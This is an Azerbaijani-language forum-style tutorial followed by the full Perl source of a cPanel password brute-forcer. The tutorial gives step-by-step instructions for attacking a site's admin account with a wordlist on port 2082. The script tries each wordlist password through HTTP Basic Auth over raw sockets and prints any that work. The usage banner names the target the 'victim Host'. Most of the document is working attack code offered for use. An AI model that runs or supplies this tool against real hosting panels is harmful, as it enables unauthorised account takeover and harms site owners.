Salamlar.Əvvəlcə Exploit Haqqında Biraz Məlumat Verim (Bilməyənlər üçün)
Bu Perl də kodlanmış Bir exploitdir. Brute Force Edərək Adminin Parolunu Tapır Bunun üçündə Gərək Yaxşı Wordlistiniz Olmalıdır
İndi isə Keçək Exploitdən istifadə Qaydasına...
Bunun üçün Əvvəlcə Active Perl Proqramını Pc-yə install Edirik Daha sonra Aşağıda Verəcəyim Exploitimizin Kodlarını Copy Edib Notepada Atırıq
Və Uzantısını Pl Şəklində edirik Məsəl üçün Cpanel.pl Daha Sonra Qurduğumuz Exploiti Yəni Cpanel.pl ni C:\Perl\bin Qovluğuna Atırıq
Eləcədə Wordlistimizidə...
Və Sonrasında Ms-Dos Pəncərəsini Açıb Bunları Yazırıq
Cd..
Cd..
Cd Perl
Cd Bin
Perl Cpanel.Pl
Yuxarıdaki Şəkildə Gördüyünüz Üzrə Exploitimizi işə Saldığımızda da istifadə Qaydası Göstərilmişdir...
Perl Cpanel.pl www.Saytadı.Com Adminin Niki 2082 wordlistimiz.txt password.txt
Bunu Etikdən Sonra Hazırladığınız wordlist işə Düşəcək Və adminin Nikini Yoxluyaraq password.txt Dəki Adminin Pass-ıYəni Parolu ilə
wordlistdəki Şifrələri Qarşılaşdıracaq Əgər Parol wordlistdəki Parollardan Biri ilə Örtüşsə Çox Gözəl Olar))...
Bunun Üçündə Yaxşı Bir wordlistiniz Olmalıdır
Exploit..
Kod:
#!/usr/bin/perl
# Cpanel Password Brute Forcer
# ----------------------------
# (c)oded By Hessam-x
# Perl Version ( low speed )
# Oerginal Advisory :
# http://www.simorgh-ev.com/advisory/2006/cpanel-bruteforce-vule/
use IO::Socket;
use LWP::Simple;
use MIME::Base64;
$host = $ARGV[0];
$user = $ARGV[1];
$port = $ARGV[2];
$list = $ARGV[3];
$file = $ARGV[4];
$url = "http://".$host.":".$port;
if(@ARGV < 3){
print q(
###############################################################
# Cpanel Password Brute Force Tool #
###############################################################
# usage : cpanel.pl [HOST] [User] [PORT][list] [File] #
#-------------------------------------------------------------#
# [Host] : victim Host (simorgh-ev.com) #
# [User] : User Name (demo) #
# [PORT] : Port of Cpanel (2082) #
#[list] : File Of password list (list.txt) #
# [File] : file for save password (password.txt) #
# #
###############################################################
# (c)oded By Hessam-x / simorgh-ev.com #
###############################################################
);exit;}
headx();
$numstart = "-1";
sub headx() {
print q(
###############################################################
# Cpanel Password Brute Force Tool #
# (c)oded By Hessam-x / simorgh-ev.com #
###############################################################
);
open (PASSFILE, "<$list") || die "[-] Can't open the List of password file !";
@PASSWORDS = <PASSFILE>;
close PASSFILE;
foreach my $P (@PASSWORDS) {
chomp $P;
$passwd = $P;
print "
[~] Try Password : $passwd
";
&brut;
};
}
sub brut() {
$authx = encode_base64($user.":".$passwd);
print $authx;
my $sock = IO::Socket::INET->new(Proto => "tcp",PeerAddr => "$host", PeerPort => "$port") || print "
[-] Can not connect to the host";
print $sock "GET / HTTP/1.1
";
print $sock "Authorization: Basic $authx
";
print $sock "Connection: Close
";
read $sock, $answer, 128;
close($sock);
if ($answer =~ /Moved/) {
print "
[~] PASSWORD FOUND : $passwd
";
exit();
}
}